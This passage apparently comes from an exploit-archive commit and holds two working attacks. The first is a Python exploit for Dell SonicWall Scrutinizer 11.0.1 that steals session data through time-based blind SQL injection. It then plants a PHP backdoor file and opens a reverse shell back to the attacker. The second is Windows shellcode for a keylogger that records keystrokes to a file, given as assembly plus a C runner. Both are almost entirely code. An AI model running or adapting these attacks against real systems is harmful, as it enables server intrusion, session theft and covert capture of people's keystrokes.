Connection-specific DNS Suffix . : localdomain
IP Address. . . . . . . . . . . . : 172.16.175.147
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 172.16.175.2
*** Connection closed by remote host ***
"""
import re
import sys
import requests
import datetime
import socket
import telnetlib
import email.utils as eut
from threading import Thread
from base64 import b64encode as b64e
lower_value = 0
upper_value = 126
def banner():
return """\n\tDell SonicWall Scrutinizer <= 11.0.1 setUserSkin/deleteTab SQLi Explo!t\n\tmr_me@offensive-security.com\n"""
def ct():
return datetime.datetime.now()
def parsedate(text):
return datetime.datetime(*eut.parsedate(text)[:6])
def check_args():
global target, lserver, lport
if len(sys.argv) < 3:
return False
cb = sys.argv[2]
target = "http://%s" % sys.argv[1]
if not ":" in cb:
return False
if not cb.split(":")[1].isdigit():
return False
lserver = cb.split(":")[0]
lport = int(cb.split(":")[1])
return True
def validate():
r = requests.get("%s/index.html" % target)
if re.search('Scrutinizer 11.0.1', r.text):
return True
return False
def have_sessions(time):
"""
check if we have sessions
"""
sqli = "if(ascii(substring((select count(session_id) from sessions),1,1))!=48,sleep(%s),null)" % (time)
url = "d4d/login.php?setSkin=1&user_id=setSkin=1&user_id=%s" % sqli
st = ct()
r = requests.get("%s/%s" % (target, url))
delta = ct()-st
if int(delta.seconds) < time:
return False
return True
def do_time_based_blind(sql, time):
lower = lower_value
upper = upper_value
while lower < upper:
try:
mid = (lower + upper) / 2
url = "%s/%s" % (target, ("%s>%s,sleep(%s),null)" % (sql, str(mid), time)))
st = ct()
r = requests.get(url)
delta = ct()-st
if int(delta.seconds) >= time:
lower = mid + 1
else:
upper = mid
except (KeyboardInterrupt, SystemExit):
raise
except:
pass
if lower > lower_value and lower < upper_value:
value = lower
else:
url = "%s/%s" % (target, ("%s=%s,sleep(%s),null)" % (sql, str(lower), time)))
st = ct()
r = requests.get(url)
delta = ct()-st
if int(delta.seconds) >= time:
value = lower
return value
def steal_session_length():
xlen = ""
sqli = "if(ascii(substring((select length(length(concat(user_id,0x3a,session_id))) from sessions limit 0,1),1,1))"
qry_str = "d4d/login.php?setSkin=1&user_id=setSkin=1&user_id=%s" % sqli
zlen = int(chr(do_time_based_blind(qry_str, 5)))
for i in range(0, zlen):
sqli = "if(ascii(substring((select length(concat(user_id,0x3a,session_id)) from sessions limit 0,1),%d,1))" % (i+1)
qry_str = "d4d/login.php?setSkin=1&user_id=setSkin=1&user_id=%s" % sqli
xlen += chr(do_time_based_blind(qry_str, 5))
return int(xlen)
def steal_session(length, time):
session = ""
for i in range(0, length):
sqli = "if(ascii(substring((select concat(user_id,0x3a,session_id) from sessions limit 0,1),%d,1))" % (i+1)
qry_str = "d4d/login.php?setSkin=1&user_id=setSkin=1&user_id=%s" % sqli
char = chr(do_time_based_blind(qry_str, 5))
session += char
sys.stdout.write(char)
sys.stdout.flush()
return session
# build the reverse php shell
def build_php_code():
phpkode = ("""
@set_time_limit(0); @ignore_user_abort(1); @ini_set('max_execution_time',0);""")
phpkode += ("""$dis=@ini_get('disable_functions');""")
phpkode += ("""if(!empty($dis)){$dis=preg_replace('/[, ]+/', ',', $dis);$dis=explode(',', $dis);""")
phpkode += ("""$dis=array_map('trim', $dis);}else{$dis=array();} """)
phpkode += ("""if(!function_exists('LcNIcoB')){function LcNIcoB($c){ """)
phpkode += ("""global $dis;if (FALSE !== strpos(strtolower(PHP_OS), 'win' )) {$c=$c." 2>&1\\n";} """)
phpkode += ("""$imARhD='is_callable';$kqqI='in_array';""")
phpkode += ("""if($imARhD('popen')and!$kqqI('popen',$dis)){$fp=popen($c,'r');""")
phpkode += ("""$o=NULL;if(is_resource($fp)){while(!feof($fp)){ """)
phpkode += ("""$o.=fread($fp,1024);}}@pclose($fp);}else""")
phpkode += ("""if($imARhD('proc_open')and!$kqqI('proc_open',$dis)){ """)
phpkode += ("""$handle=proc_open($c,array(array(pipe,'r'),array(pipe,'w'),array(pipe,'w')),$pipes); """)
phpkode += ("""$o=NULL;while(!feof($pipes[1])){$o.=fread($pipes[1],1024);} """)
phpkode += ("""@proc_close($handle);}else if($imARhD('system')and!$kqqI('system',$dis)){ """)
phpkode += ("""ob_start();system($c);$o=ob_get_contents();ob_end_clean(); """)
phpkode += ("""}else if($imARhD('passthru')and!$kqqI('passthru',$dis)){ob_start();passthru($c); """)
phpkode += ("""$o=ob_get_contents();ob_end_clean(); """)
phpkode += ("""}else if($imARhD('shell_exec')and!$kqqI('shell_exec',$dis)){ """)
phpkode += ("""$o=shell_exec($c);}else if($imARhD('exec')and!$kqqI('exec',$dis)){ """)
phpkode += ("""$o=array();exec($c,$o);$o=join(chr(10),$o).chr(10);}else{$o=0;}return $o;}} """)
phpkode += ("""$nofuncs='no exec functions'; """)
phpkode += ("""if(is_callable('fsockopen')and!in_array('fsockopen',$dis)){ """)
phpkode += ("""$s=@fsockopen('tcp://%s','%d');while($c=fread($s,2048)){$out = ''; """ % (lserver, lport))
phpkode += ("""if(substr($c,0,3) == 'cd '){chdir(substr($c,3,-1)); """)
phpkode += ("""}elseif (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit'){break;}else{ """)
phpkode += ("""$out=LcNIcoB(substr($c,0,-1));if($out===false){fwrite($s,$nofuncs); """)
phpkode += ("""break;}}fwrite($s,$out);}fclose($s);}else{ """)
phpkode += ("""$s=@socket_create(AF_INET,SOCK_STREAM,SOL_TCP);@socket_connect($s,'%s','%d'); """ % (lserver, lport))
phpkode += ("""@socket_write($s,"socket_create");while($c=@socket_read($s,2048)){ """)
phpkode += ("""$out = '';if(substr($c,0,3) == 'cd '){chdir(substr($c,3,-1)); """)
phpkode += ("""} else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') { """)
phpkode += ("""break;}else{$out=LcNIcoB(substr($c,0,-1));if($out===false){ """)
phpkode += ("""@socket_write($s,$nofuncs);break;}}@socket_write($s,$out,strlen($out)); """)
phpkode += ("""}@socket_close($s);} """)
return phpkode
def kill_shot(stolen_data):
user_id = stolen_data.split(":")[0]
sessionid = stolen_data.split(":")[1]
url = "d4d/dashboards.php?deleteTab=1 union select '<?php eval(base64_decode($_COOKIE[\\'awae\\'])); ?>' into outfile '../../html/d4d/offsec.php'"
requests.get("%s/%s" % (target, url), cookies={"userid": user_id, "sessionid": sessionid})
def exec_code():
phpkodez = b64e(build_php_code())
handlerthr = Thread(target=handler, args=(lport,))
handlerthr.start()
requests.get("%s/d4d/offsec.php" % (target), cookies={"awae": phpkodez})
def handler(lport):
print "(+) starting handler on port %d" % lport
t = telnetlib.Telnet()
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("0.0.0.0", lport))
s.listen(1)
conn, addr = s.accept()
print "(+) connection from %s" % addr[0]
t.sock = conn
print "(+) pop thy shell!"
t.interact()
def main():
if check_args():
if validate():
print "(+) target is vuln, proceeding"
st = ct()
print "(+) waiting for session data... starting at: %s" % ct()
# we dont use recursion since we could get stack exhaustion.
while not have_sessions(5):
pass
print "(+) awesome, appears like someone has logged in... "
print "(+) it took %s to detect valid session data" % (ct()-st)
sys.stdout.flush()
sys.stdout.write("(+) extracting session data... ")
dataz = steal_session(steal_session_length(), 5)
print "\n(+) backdooring target..."
kill_shot(dataz)
exec_code()
else:
print "(!) usage: %s <target> <connectback:port>" % sys.argv[0]
if __name__ == "__main__":
print banner()
main()

245
platforms/windows/shellcode/39731.c Executable file
View file

@ -0,0 +1,245 @@
/*
; Exploit Title: All windows null free shellcode - primitave keylogger to file - 431 (0x01AF) bytes
; Date: Sat Apr 23 18:34:25 GMT 2016
; Exploit Author: Fugu
; Vendor Homepage: www.microsoft.com
; Version: all afaik
; Tested on: Win7 (im guessing it will work on others)
; Note: it will write to "log.bin" in the same directory as the exe, iff that DIR is writable.
; it is kinda spammy to the logfile, and will grow quickly. keystrokes are saved in format:
; "Virtual-Key Codes", from msdn.microsoft.com website
section .bss
section .data
section .text
global _start
_start:
cld ; 00000000 FC
xor edx,edx ; 00000001 31D2
mov dl,0x30 ; 00000003 B230
push dword [fs:edx] ; 00000005 64FF32
pop edx ; 00000008 5A
mov edx,[edx+0xc] ; 00000009 8B520C
mov edx,[edx+0x14] ; 0000000C 8B5214
loc_fh:
mov esi,[edx+0x28] ; 0000000F 8B7228
xor eax,eax ; 00000012 31C0
mov ecx,eax ; 00000014 89C1
mov cl,0x3 ; 00000016 B103
loc_18h:
lodsb ; 00000018 AC
rol eax,byte 0x8 ; 00000019 C1C008
lodsb ; 0000001C AC
loop loc_18h ; 0000001D E2F9
lodsb ; 0000001F AC
cmp eax,0x4b45524e ; 00000020 3D4E52454B
jz loc_2ch ; 00000025 7405
cmp eax,0x6b65726e ; 00000027 3D6E72656B
loc_2ch:
mov ebx,[edx+0x10] ; 0000002C 8B5A10
mov edx,[edx] ; 0000002F 8B12
jnz loc_fh ; 00000031 75DC
mov edx,[ebx+0x3c] ; 00000033 8B533C
add edx,ebx ; 00000036 01DA
push dword [edx+0x34] ; 00000038 FF7234
mov edx,[edx+0x78] ; 0000003B 8B5278
add edx,ebx ; 0000003E 01DA
mov esi,[edx+0x20] ; 00000040 8B7220
add esi,ebx ; 00000043 01DE
;GetProcAddress
xor ecx,ecx ; 00000045 31C9
loc_47h:
inc ecx ; 00000047 41
lodsd ; 00000048 AD
add eax,ebx ; 00000049 01D8
cmp dword [eax],0x50746547 ; 0000004B 813847657450
jnz loc_47h ; 00000051 75F4
cmp dword [eax+0x4],0x41636f72 ; 00000053 817804726F6341
jnz loc_47h ; 0000005A 75EB
cmp dword [eax+0x8],0x65726464 ; 0000005C 81780864647265
jnz loc_47h ; 00000063 75E2
dec ecx ; 00000065 49
mov esi,[edx+0x24] ; 00000066 8B7224
add esi,ebx ; 00000069 01DE
mov cx,[esi+ecx*2] ; 0000006B 668B0C4E
mov esi,[edx+0x1c] ; 0000006F 8B721C
add esi,ebx ; 00000072 01DE
mov edx,[esi+ecx*4] ; 00000074 8B148E
add edx,ebx ; 00000077 01DA
mov edi,edx ; 00000079 89D7
push edx ; 0000007B 52
;GetModuleHandleA
xor eax,eax ; 0000007C 31C0
push eax ; 0000007E 50
push dword 0x41656c64 ; 0000007F 68646C6541
push dword 0x6e614865 ; 00000084 686548616E
push dword 0x6c75646f ; 00000089 686F64756C
push dword 0x4d746547 ; 0000008E 684765744D
push esp ; 00000093 54
push ebx ; 00000094 53
call edi ; 00000095 FFD7
lea esp,[esp+0x14] ; 00000097 8D642414
push eax ; 0000009B 50
;GetModuleHandleA("USER32.DLL")
push dword 0x88014c4c ; 0000009C 684C4C0188
dec byte [esp+0x2] ; 000000A1 FE4C2402
push dword 0x442e3233 ; 000000A5 6833322E44
push dword 0x52455355 ; 000000AA 6855534552
push esp ; 000000AF 54
call eax ; 000000B0 FFD0
xor edx,edx ; 000000B2 31D2
cmp eax,edx ; 000000B4 39D0
jnz loc_f0h ; 000000B6 7538
lea esp,[esp+0xc] ; 000000B8 8D64240C
;LoadLibraryA
push edx ; 000000BC 52
push dword 0x41797261 ; 000000BD 6861727941
push dword 0x7262694c ; 000000C2 684C696272
push dword 0x64616f4c ; 000000C7 684C6F6164
push esp ; 000000CC 54
push ebx ; 000000CD 53
call edi ; 000000CE FFD7
lea esp,[esp+0x10] ; 000000D0 8D642410
push eax ; 000000D4 50
;LoadLibraryA("USER32.DLL")
push dword 0x77014c4c ; 000000D5 684C4C0177
dec byte [esp+0x2] ; 000000DA FE4C2402
push dword 0x442e3233 ; 000000DE 6833322E44
push dword 0x52455355 ; 000000E3 6855534552
push esp ; 000000E8 54
call eax ; 000000E9 FFD0
lea esp,[esp+0xc] ; 000000EB 8D64240C
push eax ; 000000EF 50
;GetKeyState
loc_f0h:
mov edx,eax ; 000000F0 89C2
push dword 0x1657461 ; 000000F2 6861746501
dec byte [esp+0x3] ; 000000F7 FE4C2403
push dword 0x74537965 ; 000000FB 6865795374
push dword 0x4b746547 ; 00000100 684765744B
push esp ; 00000105 54
push edx ; 00000106 52
call edi ; 00000107 FFD7
lea esp,[esp+0xc] ; 00000109 8D64240C
push eax ; 0000010D 50
;WriteFile
push dword 0x55010165 ; 0000010E 6865010155
dec byte [esp+0x1] ; 00000113 FE4C2401
push dword 0x6c694665 ; 00000117 686546696C
push dword 0x74697257 ; 0000011C 6857726974
push esp ; 00000121 54
push ebx ; 00000122 53
call edi ; 00000123 FFD7
lea esp,[esp+0xc] ; 00000125 8D64240C
push eax ; 00000129 50
;CreateFileA
push dword 0x141656c ; 0000012A 686C654101
dec byte [esp+0x3] ; 0000012F FE4C2403
push dword 0x69466574 ; 00000133 6874654669
push dword 0x61657243 ; 00000138 6843726561
push esp ; 0000013D 54
push ebx ; 0000013E 53
call edi ; 0000013F FFD7
lea esp,[esp+0xc] ; 00000141 8D64240C
push eax ; 00000145 50
push dword 0x16e6962 ; 00000146 6862696E01
dec byte [esp+0x3] ; 0000014B FE4C2403
push dword 0x2e676f6c ; 0000014F 686C6F672E
xor ecx,ecx ; 00000154 31C9
push ecx ; 00000156 51
push ecx ; 00000157 51
add byte [esp],0x80 ; 00000158 80042480
push byte +0x4 ; 0000015C 6A04
push ecx ; 0000015E 51
push byte +0x2 ; 0000015F 6A02
push ecx ; 00000161 51
add byte [esp],0x4 ; 00000162 80042404
lea ecx,[esp+0x18] ; 00000166 8D4C2418
push ecx ; 0000016A 51
call eax ; 0000016B FFD0
lea esp,[esp+0x8] ; 0000016D 8D642408
push eax ; 00000171 50
;main loop
loc_172h:
xor ecx,ecx ; 00000172 31C9
xor esi,esi ; 00000174 31F6
loc_176h:
mov cl,0xff ; 00000176 B1FF
mov eax,esi ; 00000178 89F0
cmp al,cl ; 0000017A 38C8
jc loc_180h ; 0000017C 7202
xor esi,esi ; 0000017E 31F6
loc_180h:
inc esi ; 00000180 46
push esi ; 00000181 56
call dword [esp+0x10] ; 00000182 FF542410
mov edx,esi ; 00000186 89F2
xor ecx,ecx ; 00000188 31C9
mov cl,0x80 ; 0000018A B180
and eax,ecx ; 0000018C 21C8
xor ecx,ecx ; 0000018E 31C9
cmp eax,ecx ; 00000190 39C8
jz loc_176h ; 00000192 74E2
push edx ; 00000194 52
push ecx ; 00000195 51
lea ecx,[esp] ; 00000196 8D0C24
push ecx ; 00000199 51
push byte +0x1 ; 0000019A 6A01
lea ecx,[esp+0xc] ; 0000019C 8D4C240C
push ecx ; 000001A0 51
push dword [esp+0x14] ; 000001A1 FF742414
call dword [esp+0x20] ; 000001A5 FF542420
lea esp,[esp+0x4] ; 000001A9 8D642404
jmp short loc_172h ; 000001AD EBC3
*/
#include <stdio.h>
#include <string.h>
unsigned char sc[] = "\xfc\x31\xd2\xb2\x30\x64\xff\x32\x5a\x8b\x52\x0c\x8b\x52\x14\x8b"
"\x72\x28\x31\xc0\x89\xc1\xb1\x03\xac\xc1\xc0\x08\xac\xe2\xf9\xac"
"\x3d\x4e\x52\x45\x4b\x74\x05\x3d\x6e\x72\x65\x6b\x8b\x5a\x10\x8b"
"\x12\x75\xdc\x8b\x53\x3c\x01\xda\xff\x72\x34\x8b\x52\x78\x01\xda"
"\x8b\x72\x20\x01\xde\x31\xc9\x41\xad\x01\xd8\x81\x38\x47\x65\x74"
"\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64"
"\x64\x72\x65\x75\xe2\x49\x8b\x72\x24\x01\xde\x66\x8b\x0c\x4e\x8b"
"\x72\x1c\x01\xde\x8b\x14\x8e\x01\xda\x89\xd7\x52\x31\xc0\x50\x68"
"\x64\x6c\x65\x41\x68\x65\x48\x61\x6e\x68\x6f\x64\x75\x6c\x68\x47"
"\x65\x74\x4d\x54\x53\xff\xd7\x8d\x64\x24\x14\x50\x68\x4c\x4c\x01"
"\x88\xfe\x4c\x24\x02\x68\x33\x32\x2e\x44\x68\x55\x53\x45\x52\x54"
"\xff\xd0\x31\xd2\x39\xd0\x75\x38\x8d\x64\x24\x0c\x52\x68\x61\x72"
"\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x54\x53\xff\xd7"
"\x8d\x64\x24\x10\x50\x68\x4c\x4c\x01\x77\xfe\x4c\x24\x02\x68\x33"
"\x32\x2e\x44\x68\x55\x53\x45\x52\x54\xff\xd0\x8d\x64\x24\x0c\x50"
"\x89\xc2\x68\x61\x74\x65\x01\xfe\x4c\x24\x03\x68\x65\x79\x53\x74"
"\x68\x47\x65\x74\x4b\x54\x52\xff\xd7\x8d\x64\x24\x0c\x50\x68\x65"
"\x01\x01\x55\xfe\x4c\x24\x01\x68\x65\x46\x69\x6c\x68\x57\x72\x69"
"\x74\x54\x53\xff\xd7\x8d\x64\x24\x0c\x50\x68\x6c\x65\x41\x01\xfe"
"\x4c\x24\x03\x68\x74\x65\x46\x69\x68\x43\x72\x65\x61\x54\x53\xff"
"\xd7\x8d\x64\x24\x0c\x50\x68\x62\x69\x6e\x01\xfe\x4c\x24\x03\x68"
"\x6c\x6f\x67\x2e\x31\xc9\x51\x51\x80\x04\x24\x80\x6a\x04\x51\x6a"
"\x02\x51\x80\x04\x24\x04\x8d\x4c\x24\x18\x51\xff\xd0\x8d\x64\x24"
"\x08\x50\x31\xc9\x31\xf6\xb1\xff\x89\xf0\x38\xc8\x72\x02\x31\xf6"
"\x46\x56\xff\x54\x24\x10\x89\xf2\x31\xc9\xb1\x80\x21\xc8\x31\xc9"
"\x39\xc8\x74\xe2\x52\x51\x8d\x0c\x24\x51\x6a\x01\x8d\x4c\x24\x0c"
"\x51\xff\x74\x24\x14\xff\x54\x24\x20\x8d\x64\x24\x04\xeb\xc3";
int main(int argc, char *argv[]){
printf("Shellcode length: %d\n", (int)strlen(sc));
(*(void(*)(void))&sc)();
return 0;
}